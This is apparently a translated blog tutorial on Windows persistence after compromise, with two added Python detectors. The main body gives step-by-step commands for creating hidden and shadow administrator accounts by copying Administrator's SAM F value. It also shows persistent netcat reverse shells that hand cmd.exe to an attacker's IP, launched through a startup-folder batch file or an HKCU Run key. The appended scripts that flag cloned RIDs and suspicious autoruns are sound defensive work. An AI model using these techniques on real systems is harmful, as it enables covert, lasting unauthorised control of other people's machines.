Windows privilege maintenance (persistence)

Shadow account creation

Create an ordinary account
net user laosec 123admiN@ /add   #Create an ordinary account laosec with the password 123admiN@
net localgroup administrators laosec /add   #Add the ordinary account laosec to the local Administrators group

Create a hidden account
net user laosec$ 123admiN@ /add   #Create a hidden account laosec$ with the password 123admiN@ (the trailing $ hides it from "net user", but it is still visible in Computer Management and the Control Panel)
net localgroup administrators laosec$ /add   #Add the hidden account laosec$ to the local Administrators group

Create a shadow account
Step 1: Open the registry editor (run it as administrator)

WIN+R --> regedit   #Registry editor
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
#If you get an access-denied error: right-click HKEY_LOCAL_MACHINE\SAM\SAM -> Permissions, grant the current administrator user Full Control and Read, then refresh (F5) so the subkeys appear

Step 2: Modify the hidden account

Under the Users key there are subkeys named 00000XXX (the account RID in hexadecimal) and a Names subkey.
Under Names, click Administrator: the Type column of its (Default) value on the right shows a number such as 0x1f4. That number is the RID, and it identifies the 00000XXX subkey (000001F4) that belongs to Administrator.
Select the 00000XXX subkey that corresponds to Administrator, double-click the F value on the right and copy the whole hex content from the pop-up window.

#This value is what the F value of the shadow account must receive. Under Names, click the account to be turned into a shadow account (laosec$) and read its Type to get its RID, open the matching 00000XXX subkey under Users, and overwrite its F value with the content just copied. Because the copied F value carries Administrator's RID (500), laosec$ is treated as Administrator when it logs on.

Export the shadow account's key under Names (Names\laosec$) as 1.reg
Export the 00000XXX subkey under Users that corresponds to the shadow account as 2.reg

Step 3: Delete the hidden account

net user laosec$ /del   #Delete the hidden account laosec$ (its SAM keys are removed; the exported .reg files still hold them)

Step 4: Re-create the account as a shadow account

Import 1.reg into the registry (double-click it, or run reg import 1.reg)
Import 2.reg into the registry
The account now exists only as SAM keys: it is no longer listed by "net user", Computer Management or the Control Panel.

Step 5: Log out and log in as laosec$ to verify
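The same mismatch that makes the shadow account work is also how it is found: the key name under Users says one RID, the F value says another. The check below, an added example that is not part of the original post, parses an exported 2.reg offline and reports every Users\00000XXX key whose F value carries a different RID than its name. The F layout (RID as a little-endian DWORD at offset 0x30) is taken from public SAM parsers and treated here as an assumption; the sample export is constructed, not a real SAM dump.

```python
import re
from typing import Dict, List, Tuple

# Offsets inside a SAM user key's F value, per public SAM parsers (RegRipper samparse and others):
# the account RID is a little-endian DWORD at 0x30. Treated as an assumption about the layout.
F_RID_OFFSET = 0x30
F_MIN_LEN = F_RID_OFFSET + 4


def parse_reg_export(text: str) -> Dict[str, Dict[str, bytes]]:
    """Parse a 'Windows Registry Editor Version 5.00' export into
    {key path: {value name: raw bytes}} for hex-typed values.
    (A .reg file on disk is UTF-16LE with a BOM: open it with encoding="utf-16".)"""
    # Fold continuation lines first: regedit ends a line with '\' and indents the rest.
    logical: List[str] = []
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        pending = ""
        logical.append(line)
    if pending:
        logical.append(pending)

    keys: Dict[str, Dict[str, bytes]] = {}
    current = None
    value_re = re.compile(r'^"([^"]+)"=hex(?:\([0-9a-fA-F]+\))?:(.*)$')
    for line in logical:
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = value_re.match(line)
        if m and current is not None:
            name, data = m.groups()
            keys[current][name] = bytes(int(b, 16) for b in data.split(",") if b.strip())
    return keys


def rid_in_f(f: bytes) -> int:
    """RID stored inside the F value (little-endian DWORD at F_RID_OFFSET)."""
    return int.from_bytes(f[F_RID_OFFSET:F_RID_OFFSET + 4], "little")


def find_cloned_accounts(keys: Dict[str, Dict[str, bytes]]) -> List[Tuple[str, int, int]]:
    """Return (key path, RID from key name, RID from F) for every Users\\<hex RID> key whose
    F value carries a different RID than its name: the signature of a copied F value."""
    findings = []
    for path, values in keys.items():
        parent, _, leaf = path.rpartition("\\")
        if not parent.upper().endswith("\\ACCOUNT\\USERS") or not re.fullmatch(r"[0-9A-Fa-f]{8}", leaf):
            continue  # skip Names\* and anything outside the Users key
        f = values.get("F")
        if f is None or len(f) < F_MIN_LEN:
            continue
        name_rid, f_rid = int(leaf, 16), rid_in_f(f)
        if name_rid != f_rid:
            findings.append((path, name_rid, f_rid))
    return findings


# --- Constructed sample export (not a real SAM dump): 000001F5 is untouched,
# --- 000003E9 (laosec$) has received Administrator's F value, i.e. RID 0x1F4 = 500.
def _fake_f(rid: int) -> str:
    """Constructed 0x50-byte F value with only the RID field set, wrapped with '\\' like regedit does."""
    buf = bytearray(0x50)
    buf[F_RID_OFFSET:F_RID_OFFSET + 4] = rid.to_bytes(4, "little")
    hexbytes = [f"{b:02x}" for b in buf]
    lines = [",".join(hexbytes[i:i + 20]) for i in range(0, len(hexbytes), 20)]
    return ",\\\n  ".join(lines)


SAMPLE_2_REG = f"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F5]
"F"=hex:{_fake_f(0x1F5)}

[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003E9]
"F"=hex:{_fake_f(0x1F4)}
"""

if __name__ == "__main__":
    for path, name_rid, f_rid in find_cloned_accounts(parse_reg_export(SAMPLE_2_REG)):
        print(f"{path}: key name says RID {name_rid}, F value says RID {f_rid}")
```

On a live system the same comparison can be made with the SAM hive copied out via a shadow copy or with the permission change from Step 1; the point is that the key name and the RID inside F should always agree, and a copied F value is the one case where they do not.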

NC automatic reverse shell

The idea is to upload nc to the target and use the registry or a startup program so that nc runs at the next boot/logon -> restart the server -> receive the target's CMD shell.

Preconditions:
The attacker's network and the victim's network must be able to reach each other.
The attacker's VPS must keep listening on the chosen port.

NC routine test

nc -lvvp port   #Run on the attacker's VPS: listen on the local port
nc -t -e cmd.exe ip port   #Run on the victim: connect back to the attacker's VPS and hand it cmd.exe

  1. Startup folder

On the victim host, open the startup folder
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup (on Windows Vista and later: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup)
and create sys.bat in that startup folder with the content
start /b nc -t -e cmd.exe 192.168.31.132 4444
(nc.exe must be on the PATH or referenced by its full path.)
Start listening on the attacker's host, restart the victim's host and wait for the shell to connect back. The startup folder runs when that user logs on, so the shell only arrives once Administrator logs on.

  2. Registry startup

Here sys.bat (same content as above) is placed at C:\sys.bat and registered in the current user's Run key:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "sysone" /t REG_SZ /d "C:\sys.bat" /f

Parameter description:
/v  name of the value to add under the key
/t  data type of the value; REG_SZ if omitted
/d  data to assign to the value
/f  overwrite an existing entry without prompting
Start listening on the attacker's host, restart the victim's host and wait for the shell to connect back. Values under HKCU\...\Run run when that user logs on interactively, not at boot, so as with the startup folder the shell only arrives once Administrator logs on.
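Both autostart methods above leave the same two traces: a Run value and/or a startup-folder script whose command launches a script from an odd location or hands cmd.exe to netcat. The triage below is an added example, not part of the original post: it parses the text that "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" prints, inspects the files in the startup folder, and lists each entry with the reasons it looks like this kind of persistence. The reg query output and the startup-folder contents are constructed samples, and the heuristics (script extension, drive-root path, netcat binary name, "-e cmd.exe") are this example's own choices rather than anything the post specifies.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of "reg query HKCU\...\Run" output (not captured from a real host).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\laosec\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    sysone    REG_SZ    C:\sys.bat
    Updater    REG_EXPAND_SZ    %APPDATA%\tools\nc.exe -e cmd.exe 192.168.31.132 4444
"""

# Constructed contents of the user's startup folder: {file name: file text}.
SAMPLE_STARTUP_FOLDER = {
    "desktop.ini": "[.ShellClassInfo]\r\nLocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21787\r\n",
    "sys.bat": "start /b nc -t -e cmd.exe 192.168.31.132 4444\r\n",
}

SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta"}
NETCAT_NAMES = {"nc", "nc.exe", "nc64.exe", "ncat", "ncat.exe", "netcat.exe"}
# nc's -e / -c flags followed by a shell: the "hand cmd.exe to the network" pattern
SHELL_HANDOFF = re.compile(r"(?i)(?:^|\s)-[ec]\s+(?:cmd(?:\.exe)?|powershell(?:\.exe)?)\b")


def parse_reg_query(text: str) -> List[Tuple[str, str, str]]:
    """Parse 'reg query' output into (value name, type, data) triples.
    Value lines are indented by four spaces and the three columns are separated by four spaces."""
    entries = []
    for line in text.splitlines():
        if not line.startswith("    "):
            continue  # key path header or blank line
        parts = re.split(r"\s{4,}", line.strip(), maxsplit=2)
        if len(parts) == 3:
            entries.append((parts[0], parts[1], parts[2]))
    return entries


def command_path(data: str) -> str:
    """Return the program a command line launches: the quoted token, else the first token."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0] if data else ""


def suspicious_reasons(command: str) -> List[str]:
    """Heuristics matching the persistence entries described on the page; empty list means clean."""
    reasons = []
    path = command_path(command)
    base = path.rsplit("\\", 1)[-1].lower()
    ext = "." + base.rsplit(".", 1)[-1] if "." in base else ""
    if ext in SCRIPT_EXTS:
        reasons.append(f"launches a script ({ext})")
    if base in NETCAT_NAMES:
        reasons.append("launches netcat")
    if re.fullmatch(r"[A-Za-z]:\\[^\\]+", path):
        reasons.append("program sits in a drive root")
    if SHELL_HANDOFF.search(command):
        reasons.append("hands cmd.exe/powershell to a network connection (-e/-c)")
    return reasons


def scan_startup_folder(files: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Flag scripts in the startup folder and inspect each line they run."""
    findings = []
    for name, content in files.items():
        reasons = []
        lower = name.lower()
        if "." in lower and "." + lower.rsplit(".", 1)[-1] in SCRIPT_EXTS:
            reasons.append("script in startup folder")
            for line in (content or "").splitlines():
                # strip a leading "start [/switches]" so the real program is inspected
                cmd = re.sub(r"(?i)^\s*start\s+(?:/\w+\s+)*", "", line)
                reasons += suspicious_reasons(cmd)
        if reasons:
            findings.append((name, reasons))
    return findings


def triage_autoruns(reg_query_output: str, startup_files: Dict[str, str]) -> Dict[str, List[str]]:
    """Combine both autostart locations into {location\\entry: [reasons]}."""
    findings: Dict[str, List[str]] = {}
    for name, _type, data in parse_reg_query(reg_query_output):
        reasons = suspicious_reasons(data)
        if reasons:
            findings["Run\\" + name] = reasons
    for name, reasons in scan_startup_folder(startup_files):
        findings["Startup\\" + name] = reasons
    return findings


if __name__ == "__main__":
    for where, why in triage_autoruns(SAMPLE_REG_QUERY, SAMPLE_STARTUP_FOLDER).items():
        print(where, "->", "; ".join(why))
```

On a real host, feed it the output of reg query for both the HKCU and HKLM Run keys and a listing of every user's startup folder; the OneDrive entry in the sample is there to show that an ordinary signed-program autorun produces no reasons.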

Result verification

Origin blog.51cto.com/15095759/2607704